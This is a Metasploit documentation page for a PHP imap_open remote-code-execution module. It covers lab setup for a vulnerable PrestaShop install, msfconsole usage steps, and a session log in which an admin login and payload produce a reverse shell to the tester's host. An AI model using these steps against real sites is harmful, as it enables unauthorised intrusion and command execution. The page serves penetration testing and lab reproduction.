adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
4b0958404740d418bcbbb6dbbf32fa02a287c918
metasploit-gs/documentation/modules/exploit/linux/http/php_imap_open_rce.md
T
h00die 4b09584047 php_imap_open_rce
2018-11-18 21:28:19 -05:00

5.4 KiB
Raw Blame History

Vulnerable Application

The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's ProxyCommand option can be passed from imap_open to execute arbitrary commands. While many custom applications may use imap_open, it is reported that the following applications are vulnerable:

  • instantcms

  • HostCMS

  • e107_2

  • prestashop

  • SuiteCRM

  • SugarCRM

    Prestashop exploitation requires the admin URI, and administrator credentials.

Prestashop on Ubuntu 16.04

Mostly derived from websiteforstudents.com, with a few tweeks for Ubuntu 16.04, and to install PHP's imap mod.

sudo apt install apache2
sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf
sudo systemctl stop apache2.service
sudo systemctl start apache2.service
sudo systemctl enable apache2.service
sudo apt-get install mariadb-server mariadb-client
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo systemctl restart mysql.service
sudo apt install php libapache2-mod-php php-common php-mbstring php-xmlrpc php-soap php-gd php-xml php-intl php-mysql php-cli php-mcrypt php-ldap php-zip php-curl php-imap
sudo phpenmod imap
sudo mysql -u root -p

CREATE USER 'prestashopuser'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON prestashop.* TO 'prestashopuser'@'localhost' IDENTIFIED BY 'user_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;

cd /tmp && curl -O https://download.prestashop.com/download/releases/prestashop_1.7.2.4.zip
unzip prestashop_1.7.2.4.zip
sudo mkdir -p /var/www/html/prestashop
sudo unzip prestashop.zip -d /var/www/html/prestashop/
sudo chown -R www-data:www-data /var/www/html/prestashop/
sudo chmod -R 755 /var/www/html/prestashop/
sudo nano /etc/apache2/sites-available/prestashop.conf

Utilize the following configuration:

<VirtualHost *:80>
     ServerAdmin admin@example.com
     DocumentRoot /var/www/html/prestashop/
     ServerName example.com
     ServerAlias www.example.com

     <Directory /var/www/html/prestashop/>
        Options +FollowSymlinks
        AllowOverride All
        Require all granted
     </Directory>

     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

sudo a2ensite prestashop.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service

Browse to the website, and install with default information.

sudo rm -rf /var/www/html/prestashop/install/

Now browse to /admin, and the first time you'll be redirected to the admin URI. If not, sudo ls /var/www/html/prestashop/admin*.

Verification Steps

  1. Install a vulnerable application
  2. Start msfconsole
  3. Do: use exploit/linux/http/php_imap_open_rce
  4. Do: set TARGETURI [URI]
  5. Do: set USERNAME [username]
  6. Do: set PASSWORD [password]
  7. Do: set target [target]
  8. Do: run
  9. You should get a shell.

Options

TARGETURI

The URI for the target. This may change by target. Default is ``. Prestashop should be the admin URI, similar to /admin2769gx8k3.

Scenarios

PrestaShop 1.7.2.4 on Ubuntu 16.04.4 with PHP 7.0

resource (presta.rb)> use exploit/linux/http/php_imap_open_rce
resource (presta.rb)> set TARGETURI /admin2769gx8k3
TARGETURI => /admin2769gx8k3
resource (presta.rb)> set USERNAME ubuntu@none.com
USERNAME => ubuntu@none.com
resource (presta.rb)> set PASSWORD ubuntuubuntu
PASSWORD => ubuntuubuntu
resource (presta.rb)> set rhosts 192.168.2.139
rhosts => 192.168.2.139
resource (presta.rb)> set verbose true
verbose => true
resource (presta.rb)> exploit
[*] Started reverse TCP double handler on 192.168.2.117:4444 
[*] Redirected to http://192.168.2.139/admin2769gx8k3/
[*] Redirected to http://192.168.2.139/admin2769gx8k3/index.php?controller=AdminLogin&token=6dab1f7b4eea17d2b44a8929ead9df68
[*] Token: 6dab1f7b4eea17d2b44a8929ead9df68 and Login Redirect: http://192.168.2.139/admin2769gx8k3/&token=09283f9efc45fc75eca3b8d5f1b1f92f
[*] Logging in with ubuntu@none.com:ubuntuubuntu
[*] Login JSON Response: {"hasErrors":false,"redirect":"http:\/\/192.168.2.139\/admin2769gx8k3\/index.php?controller=AdminDashboard&token=e324e8b387afb1874947db9b1ba411c8"}
[+] Login Success, loading admin dashboard to pull tokens
[*] Customer Threads Token: ec653c8bfc09754fc63aaa94101911dc
[+] Sending Payload with Final Token: ec653c8bfc09754fc63aaa94101911dc
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ivxULEW4eweTiis7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "ivxULEW4eweTiis7\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.139:41746) at 2018-11-18 21:08:50 -0500

uname -a
Linux ubuntu1604 4.4.0-138-generic #164-Ubuntu SMP Tue Oct 2 17:16:02 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reference in New Issue View Git Blame Copy Permalink